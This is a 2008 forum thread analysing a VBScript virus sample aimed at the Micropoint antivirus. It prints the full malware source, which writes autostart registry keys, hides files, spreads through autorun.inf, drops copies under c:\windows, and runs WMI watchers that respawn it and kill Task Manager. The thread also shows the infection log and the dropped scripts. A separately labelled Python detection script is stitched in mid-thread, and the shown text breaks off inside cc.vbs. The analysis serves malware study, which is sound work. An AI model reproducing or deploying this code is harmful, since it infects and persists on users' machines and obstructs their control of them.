Views: 4628 | Replies: 21

[Virus sample] Continued: a brief analysis of 1.VBS, tailor-made for Micropoint

白玉箫
Posted 2008-3-14 08:35:16
Uploading the virus package first
^_^
Test environment: virtual machine
Test virus package: 1.RAR
Network: not connected

Password: 123456


Rating: 1 participant, experience +10
promised: +10, reason: "the board is better with you here :)"

白玉箫
OP | Posted 2008-3-14 08:37:21
After extracting, I saw 1.vbs
1.vbs code contents:
'Add registry entries
Set AA=CreateObject("Wscript.Shell")
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Command Processor\AutoRun","c:\windows\cmd.bat","REG_SZ"
AA.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load","c:\aa\BB.vbs","REG_SZ"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\KernelFaultCheck","c:\windows\cc.vbs","REG_SZ"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","0","REG_DWORD"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue","0","REG_DWORD"
AA.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun","91","REG_DWORD"
set AA=nothing
on error resume next
Set fsofile = CreateObject("Scripting.FileSystemObject")
'Back up the virus body
set self=fsofile.opentextfile(wscript.scriptfullname,1)'Open the current file (this script) for reading
vbscopy=self.readall 'Read the entire virus code into the string variable vbscopy
set tsobj=fsofile.opentextfile("c:\windows\vv.dll",2,true)'Make a backup of the virus body
tsobj.write vbscopy  'Overwrite the target file with the virus code
tsobj.close
vbscopy=left(vbscopy,13280)
set tsobj1=fsofile.opentextfile("c:\windows\uctools.dll",2,true)
tsobj1.write vbscopy
tsobj1.close
'Create the temporary directory c:\aa
Set f = fsofile.CreateFolder("c:\aa")
fsofile.CopyFile "c:\windows\uctools.dll","c:\windows\cc.vbs"
fsofile.CopyFile "c:\windows\vv.dll","c:\aa\cc.vbs"'Copy the virus into the aa temporary directory
Set objFolder = fsofile.GetFolder("C:\aa")
If objFolder.Attributes = objFolder.Attributes AND 2 Then
    objFolder.Attributes = objFolder.Attributes XOR 2  
End If
'Create the BB.VBS file
set vbsfile=fsofile.CreateTextFile("c:\aa\bb.vbs", True)
vbsfile.WriteLine("Const HIDDEN_WINDOW = 12")
vbsfile.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
vbsfile.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
vbsfile.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
vbsfile.WriteLine("Set objStartup = objWMIService.Get("&Chr(34)&"Win32_ProcessStartup"&Chr(34)&")")
vbsfile.WriteLine("Set objConfig = objStartup.SpawnInstance_")
vbsfile.WriteLine("objConfig.ShowWindow = HIDDEN_WINDOW")
vbsfile.WriteLine("Set objProcess = GetObject("&Chr(34)&"winmgmts:root\cimv2:Win32_Process"&Chr(34)&")")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst z: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst x: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst m: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst n: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst y: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
vbsfile.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
vbsfile.WriteLine("set shl = nothing")
vbsfile.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
vbsfile.WriteLine("set run1=nothing")
vbsfile.WriteLine("Wscript.Echo("&Chr(34)&"微点您什么时候,才会对我下手"&Chr(34)&")")
vbsfile.Close
fsofile.CopyFile"c:\aa\bb.vbs","c:\windows\bb.dll"
'Create the cmd.bat file
set windowscmd=fsofile.CreateTextFile("c:\windows\cmd.bat", True)
windowscmd.WriteLine("@echo off")
windowscmd.WriteLine("echo [AUTORUN] >c:\autorun.inf")
windowscmd.WriteLine("echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>c:\autorun.inf")
windowscmd.WriteLine("echo ICON=explorer.exe >>c:\autorun.inf")
windowscmd.WriteLine("echo [AUTORUN] >d:\autorun.inf")
windowscmd.WriteLine("echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>d:\autorun.inf")
windowscmd.WriteLine("echo ICON=explorer.exe >>d:\autorun.inf")
windowscmd.WriteLine("attrib c:\autorun.inf +h +s +r")
windowscmd.WriteLine("attrib d:\autorun.inf +h +s +r")
windowscmd.WriteLine("cls")
windowscmd.WriteLine("copy c:\widnows\uctools.dll c:\windows\cc.vbs /y")
windowscmd.WriteLine("copy c:\windows\system32\backup.dll c:\windows\backup.vbs /y" )
windowscmd.WriteLine("cls")
windowscmd.WriteLine("echo set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&") >c:\windows\aa.vbs")
windowscmd.WriteLine("echo run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34)&" >>c:\windows\aa.vbs")
windowscmd.WriteLine("echo run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34)&" >>c:\windows\aa.vbs")
windowscmd.WriteLine("echo set run1=nothing>>c:\windows\aa.vbs")
windowscmd.WriteLine("cscript c:\windows\aa.vbs")
windowscmd.WriteLine("cls")
windowscmd.WriteLine("echo Microsoft Windows XP [版本 5.1.2600]")
windowscmd.WriteLine("echo (C) 版权所有 1985-2001 Microsoft Corp.")
windowscmd.WriteLine("echo.")
windowscmd.Close
'Create backup.dll, which watches the aa directory for changes
set dllfile=fsofile.CreateTextFile("c:\windows\system32\backup.dll", True)
dllfile.WriteLine("on error resume next")
dllfile.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
dllfile.WriteLine("Set f = fsofile.CreateFolder("&Chr(34)&"c:\aa"&Chr(34)&")")
dllfile.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\bb.dll"&Chr(34)&","&Chr(34)&"c:\aa\bb.vbs"&Chr(34))
dllfile.WriteLine("set fsofile=nothing")
dllfile.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
dllfile.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & _")
dllfile.WriteLine("strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
dllfile.WriteLine("Set colMonitoredEvents = objWMIService.ExecNotificationQuery _")
dllfile.WriteLine("("&Chr(34)&"SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"Targetinstance ISA 'CIM_DirectoryContainsFile' and "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"TargetInstance.GroupComp _")
dllfile.WriteLine("& "&Chr(34)&"'Win32_Directory.Name="&Chr(34)&Chr(34)&"c:\\\\aa"&Chr(34)&Chr(34)&"'"&Chr(34)&")")
dllfile.WriteLine("Do")
dllfile.WriteLine("Set objLatestEvent = colMonitoredEvents.NextEvent")
dllfile.WriteLine("WScript.Sleep 10000")
dllfile.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
dllfile.WriteLine("Set f = fsofile.CreateFolder("&Chr(34)&"c:\aa"&Chr(34)&")")
dllfile.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\bb.dll"&Chr(34)&","&Chr(34)&"c:\aa\bb.vbs"&Chr(34))
dllfile.WriteLine("set fsofile=nothing")
dllfile.WriteLine("Loop")
dllfile.Close:
fsofile.CopyFile "c:\windows\system32\backup.dll","c:\windows\backup.vbs"
'Create the process monitor file mon1.vbs
set mon1=fsofile.CreateTextFile("c:\windows\system32\mon1.vbs", True)
mon1.WriteLine("on error resume next")
mon1.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon1.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon1.WriteLine(" & "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon1.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon1.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancedeletionevent "&Chr(34)&" _ ")
mon1.WriteLine("& "&Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon1.WriteLine("i = 0")
mon1.WriteLine("Do While i = 0")
mon1.WriteLine("Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon1.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon1.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon1.WriteLine("set shl = nothing")
mon1.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
mon1.WriteLine("set run1=nothing")
mon1.WriteLine("Wscript.Echo("&Chr(34)&"可爱的微点,我将让您头痛的很"&Chr(34)&")")
mon1.WriteLine("Loop")
mon1.close
'Create the process monitor file mon2.vbs
set mon2=fsofile.CreateTextFile("c:\windows\system32\mon2.vbs", True)
mon2.WriteLine("on error resume next")
mon2.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon2.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon2.WriteLine(" & "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon2.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon2.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancedeletionevent "&Chr(34)&" _ ")
mon2.WriteLine("& "&Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon2.WriteLine("i = 0:Do While i = 0:Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon2.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon2.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon2.WriteLine("set shl = nothing")
mon2.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
mon2.WriteLine("set run1=nothing")
mon2.WriteLine("Loop")
mon2.close
'Create the Task Manager monitor mon3.vbs
set mon3=fsofile.CreateTextFile("c:\windows\system32\mon3.vbs", True)
mon3.WriteLine("on error resume next")
mon3.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon3.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon3.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon3.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon3.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancecreationevent "&Chr(34)&" _")
mon3.WriteLine("& " &Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon3.WriteLine("i=0:Do While i = 0:Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon3.WriteLine("If objLatestProcess.TargetInstance.Name = "&Chr(34)&"taskmgr.exe"&Chr(34)&" or objLatestProcess.TargetInstance.Name = "&Chr(34)&"TASKMGR.EXE"&Chr(34)&"  Then")
mon3.WriteLine("objLatestProcess.TargetInstance.Terminate")
mon3.WriteLine("End If:Loop")
mon3.close
'Create the windows directory monitor mon4.vbs
set mon4=fsofile.CreateTextFile("c:\windows\system32\mon4.vbs", True)
mon4.WriteLine("on error resume next")
mon4.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon4.WriteLine("on error resume next")
mon4.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon4.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & _")
mon4.WriteLine("strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon4.WriteLine("Set colMonitoredEvents = objWMIService.ExecNotificationQuery _")
mon4.WriteLine("("&Chr(34)&"SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"Targetinstance ISA 'CIM_DirectoryContainsFile' and "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"TargetInstance.GroupComp _")
mon4.WriteLine("& "&Chr(34)&"'Win32_Directory.Name="&Chr(34)&Chr(34)&"c:\\\\windows"&Chr(34)&Chr(34)&"'"&Chr(34)&")")
mon4.WriteLine("Do")
mon4.WriteLine("Set objLatestEvent = colMonitoredEvents.NextEvent")
mon4.WriteLine("WScript.Sleep 10000")
mon4.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon4.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon4.WriteLine("set fsofile=nothing")
mon4.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon4.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon4.WriteLine("set run1=nothing:Loop")
mon4.close
set fsofile=nothing
'Run the 5 monitor programs
'''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''
set run1=createobject("WScript.Shell")  
run1.run"c:\windows\backup.vbs"  
run1.run"c:\windows\system32\mon1.vbs"
'run1.run"c:\windows\system32\mon2.vbs"
'run1.run"c:\windows\system32\mon3.vbs"
run1.run"c:\windows\system32\mon4.vbs"
set run1=nothing
Wscript.Echo("可爱的微点您一直对我无动于衷,这将使您的用户电脑系统死于我的手上,这同样也将成为您的坟墓,希望你为了自己的生存能够尽快解决")
Wscript.Echo("希望您(微点)能尽快解决,俺主人对国产杀毒是很看重的,特别是您(东方微点)跟费尔托斯是俺主人最为看重的两款杀毒软件,请您(微点)别让俺主人失望;俺主人其实并不是存心刁难您的,只是想让您(微点)的主人能够重视俺这类脚本病毒;在逛网页时像俺这样的脚本是很容易中的,相信您(微点)的主人比俺的主人跟清楚;俺的主人一直会期待着您能够拦截俺这类病毒.....")
Wscript.Echo("期待着黎明的阳光,期待微点的上市.........")
白玉箫
OP | Posted 2008-3-14 08:39:07
Double-clicking it immediately shows this prompt:
可爱的微点您一直对我无动于衷,这将使您的用户电脑系统死于我的手上,这同样也将成为您的坟墓,希望你为了自己的生存能够尽快解决

After clicking OK, another prompt:
希望您(微点)能尽快解决,俺主人对国产杀毒是很看重的,特别是您(东方微点)跟费尔托斯是俺主人最为看重的两款杀毒软件,请您(微点)别让俺主人失望;俺主人其实并不是存心刁难您的,只是想让您(微点)的主人能够重视俺这类脚本病毒;在逛网页时像俺这样的脚本是很容易中的,相信您(微点)的主人比俺的主人跟清楚;俺的主人一直会期待着您能够拦截俺这类病毒.....

Click OK, and it prompts again:
期待着黎明的阳光,期待微点的上市.........


Click OK again, and it prompts again:
可爱的微点,我将让您头痛的很

Click OK once more
and finally no more prompts.
Now let's look at the log:
2008-03-13 20:31:03    应用程序保护(结束/挂起进程)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\wbem\wmiprvse.exe  
目标进程:C:\WINDOWS\system32\taskmgr.exe  // it suspends the process; better done than the first sample, but if Task Manager was opened before running the vbs you can kill the WScript.exe processes (about 5-6 of them), although C:\WINDOWS\system32\wbem\wmiprvse.exe cannot be killed
2008-03-13 20:30:38    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\Explorer.EXE
文件路径:C:\WINDOWS\system32\taskmgr.exe  // this was me trying to look at the process list
2008-03-13 20:23:19    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\svchost.exe
文件路径:C:\WINDOWS\system32\wbem\wmiprvse.exe
命令行:-Embedding   
2008-03-13 20:22:47    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\WINDOWS\System32\WScript.exe
命令行:"c:\windows\backup.vbs"   
2008-03-13 20:22:40    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\system32\backup.dll
2008-03-13 20:22:39    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\bb.dll
2008-03-13 20:22:36    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\uctools.dll         
2008-03-13 20:22:35    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\vv.dll        // file written into SYSTEM32
2008-03-13 20:22:32    注册表保护(修改注册表内容)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
注册表名称:KernelFaultCheck
更改后:c:\windows\cc.vbs
更改前:c:\windows\cc.vbs                              // again loading from under WINDOWS
2008-03-13 20:22:31    注册表保护(修改注册表内容)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
注册表名称:load
更改后:c:\aa\BB.vbs
更改前:c:\aa\BB.vbs                        // registry load point
2008-03-13 20:22:21    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\Explorer.EXE
文件路径:C:\WINDOWS\System32\WScript.exe          // still going this route, still this process
命令行:"C:\Documents and Settings\Administrator\桌面\1.vbs"  
2008-03-13 20:19:25    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\Explorer.EXE
文件路径:C:\Program Files\WinRAR\WinRAR.exe
命令行:x -iext -ow -ver -- "C:\Documents and Settings\Administrator\桌面\1.rar" "C:\Documents and Settings\Administrator\桌面\"      
2008-03-13 20:15:18    文件保护已经开启.

2008-03-13 20:15:18    注册表保护已经开启.

2008-03-13 20:15:18    应用程序保护已经开启.


Going into the C drive, the familiar AA folder is there again; going inside, the equally familiar bb.vbs and cc.vbs.
Bb.vbs code:
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("cmd /k subst z: c:\windows", null, objConfig, intProcessID)
errReturn = objProcess.Create("cmd /k subst x: c:\windows", null, objConfig, intProcessID)
errReturn = objProcess.Create("cmd /k subst m: c:\windows", null, objConfig, intProcessID)
errReturn = objProcess.Create("cmd /k subst n: c:\windows", null, objConfig, intProcessID)
errReturn = objProcess.Create("cmd /k subst y: c:\windows", null, objConfig, intProcessID)
Set shl = CreateObject("Scripting.FileSystemObject")
shl.CopyFile "c:\windows\uctools.dll","c:\windows\cc.vbs"
set shl = nothing
set run1=createobject("WScript.Shell")
run1.run"c:\windows\cc.vbs"
run1.run"c:\windows\backup.vbs"
run1.run"c:\windows\system32\mon3.vbs"
run1.run"c:\windows\system32\mon4.vbs"
run1.run"c:\windows\system32\mon2.vbs"
run1.run"c:\windows\system32\mon1.vbs"
set run1=nothing
Wscript.Echo("微点您什么时候,才会对我下手")
A prompt pops up:
“可爱的微点,我将让您头痛的很” ------ this is the content called from cc.vbs
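The log block in this post is the Micropoint HIPS trace of the infection, printed newest entry first. As an added example (not the poster's code and not part of the thread), the following Python script parses that log format, rebuilds the chronological timeline, and flags the behaviours the analysis points out: a script host (WScript.exe/cscript.exe) dropping files under %windir%, writes to the autostart registry locations this sample uses, one script host launching a further script, and Task Manager being terminated. The log excerpt in SAMPLE_LOG is constructed, modelled on the post's log; the registry watch list is taken from the sample's RegWrite calls.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime

# Constructed excerpt modelled on the HIPS log quoted in the post (newest first).
SAMPLE_LOG = r"""
2008-03-13 20:31:03    应用程序保护(结束/挂起进程)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\wbem\wmiprvse.exe
目标进程:C:\WINDOWS\system32\taskmgr.exe
2008-03-13 20:22:47    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\WINDOWS\System32\WScript.exe
命令行:"c:\windows\backup.vbs"
2008-03-13 20:22:40    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\system32\backup.dll
2008-03-13 20:22:32    注册表保护(修改注册表内容)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
注册表名称:KernelFaultCheck
更改后:c:\windows\cc.vbs
更改前:c:\windows\cc.vbs
2008-03-13 20:22:31    注册表保护(修改注册表内容)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
注册表名称:load
更改后:c:\aa\BB.vbs
更改前:c:\aa\BB.vbs
2008-03-13 20:22:21    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\Explorer.EXE
文件路径:C:\WINDOWS\System32\WScript.exe
命令行:"C:\Documents and Settings\Administrator\桌面\1.vbs"
2008-03-13 20:15:18    文件保护已经开启.
"""

# Header line: timestamp, protection module, optional (action), optional verdict.
HEADER = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<module>[^()\s]+)(?:\((?P<action>[^)]+)\))?"
    r"(?:\s+操作:(?P<verdict>.+?))?\s*$"
)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WINDIR = "c:\\windows\\"
# Autostart keys the sample writes: key path (lower case) -> value names (None = any).
ASEP_KEYS = {
    r"hkey_local_machine\software\microsoft\command processor": {"autorun"},
    r"hkey_current_user\software\microsoft\windows nt\currentversion\windows": {"load", "run"},
    r"hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer\run": None,
}


@dataclass
class Event:
    ts: datetime
    module: str          # 应用程序保护 / 文件保护 / 注册表保护
    action: str          # 运行应用程序 / 创建文件 / 修改注册表内容 / 结束/挂起进程
    verdict: str
    fields: dict = field(default_factory=dict)   # the key:value lines that follow


@dataclass
class Finding:
    ts: datetime
    rule: str
    detail: str


def parse_log(text):
    """Parse the HIPS log into Event records, oldest first."""
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HEADER.match(line)
        if m:
            events.append(Event(datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                                m["module"], m["action"] or "", m["verdict"] or ""))
        elif events and ":" in line:             # detail line belongs to the last header
            key, value = line.split(":", 1)
            events[-1].fields[key.strip()] = value.strip()
    events.sort(key=lambda e: e.ts)              # product prints newest first
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events):
    """Apply the four behavioural rules and return Findings in time order."""
    findings = []
    for e in events:
        proc = basename(e.fields.get("进程路径", ""))
        target = e.fields.get("文件路径", "")
        if e.action == "创建文件" and proc in SCRIPT_HOSTS and target.lower().startswith(WINDIR):
            findings.append(Finding(e.ts, "script host dropped file under %windir%", target))
        elif e.action == "修改注册表内容":
            key = e.fields.get("注册表路径", "").lower()
            name = e.fields.get("注册表名称", "").lower()
            names = ASEP_KEYS.get(key)
            if key in ASEP_KEYS and (names is None or name in names):
                findings.append(Finding(e.ts, "autostart registry value written",
                                        f"{key}\\{name} = {e.fields.get('更改后', '')}"))
        elif (e.action == "运行应用程序" and proc in SCRIPT_HOSTS
              and e.fields.get("命令行", "").strip('"').lower().endswith(".vbs")):
            findings.append(Finding(e.ts, "script host launched another script", e.fields["命令行"]))
        elif e.action == "结束/挂起进程" and basename(e.fields.get("目标进程", "")) == "taskmgr.exe":
            findings.append(Finding(e.ts, "Task Manager terminated (anti-analysis)",
                                    "by " + e.fields.get("进程路径", "")))
    return findings


def timeline(findings):
    return [f"{f.ts:%H:%M:%S}  {f.rule}: {f.detail}" for f in findings]


if __name__ == "__main__":
    print("\n".join(timeline(analyse(parse_log(SAMPLE_LOG)))))
```

The launch of 1.vbs itself by Explorer.EXE is deliberately not flagged: a user double-clicking a script is normal, whereas WScript.exe spawning backup.vbs and the wmiprvse.exe-driven termination of taskmgr.exe are the chain worth alerting on.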
白玉箫
OP | Posted 2008-3-14 08:40:06
Cc.vbs code contents are as follows:
'Add registry entries
Set AA=CreateObject("Wscript.Shell")
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Command Processor\AutoRun","c:\windows\cmd.bat","REG_SZ"
AA.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load","c:\aa\BB.vbs","REG_SZ"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\KernelFaultCheck","c:\windows\cc.vbs","REG_SZ"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","0","REG_DWORD"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue","0","REG_DWORD"
AA.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun","91","REG_DWORD"
set AA=nothing
on error resume next
Set fsofile = CreateObject("Scripting.FileSystemObject")
'Back up the virus body
set self=fsofile.opentextfile(wscript.scriptfullname,1)'Open the current file (this script) for reading
vbscopy=self.readall 'Read the entire virus code into the string variable vbscopy
set tsobj=fsofile.opentextfile("c:\windows\vv.dll",2,true)'Make a backup of the virus body
tsobj.write vbscopy  'Overwrite the target file with the virus code
tsobj.close
vbscopy=left(vbscopy,13280)
set tsobj1=fsofile.opentextfile("c:\windows\uctools.dll",2,true)
tsobj1.write vbscopy
tsobj1.close
'Create the temporary directory c:\aa
Set f = fsofile.CreateFolder("c:\aa")
fsofile.CopyFile "c:\windows\uctools.dll","c:\windows\cc.vbs"
fsofile.CopyFile "c:\windows\vv.dll","c:\aa\cc.vbs"'Copy the virus into the aa temporary directory
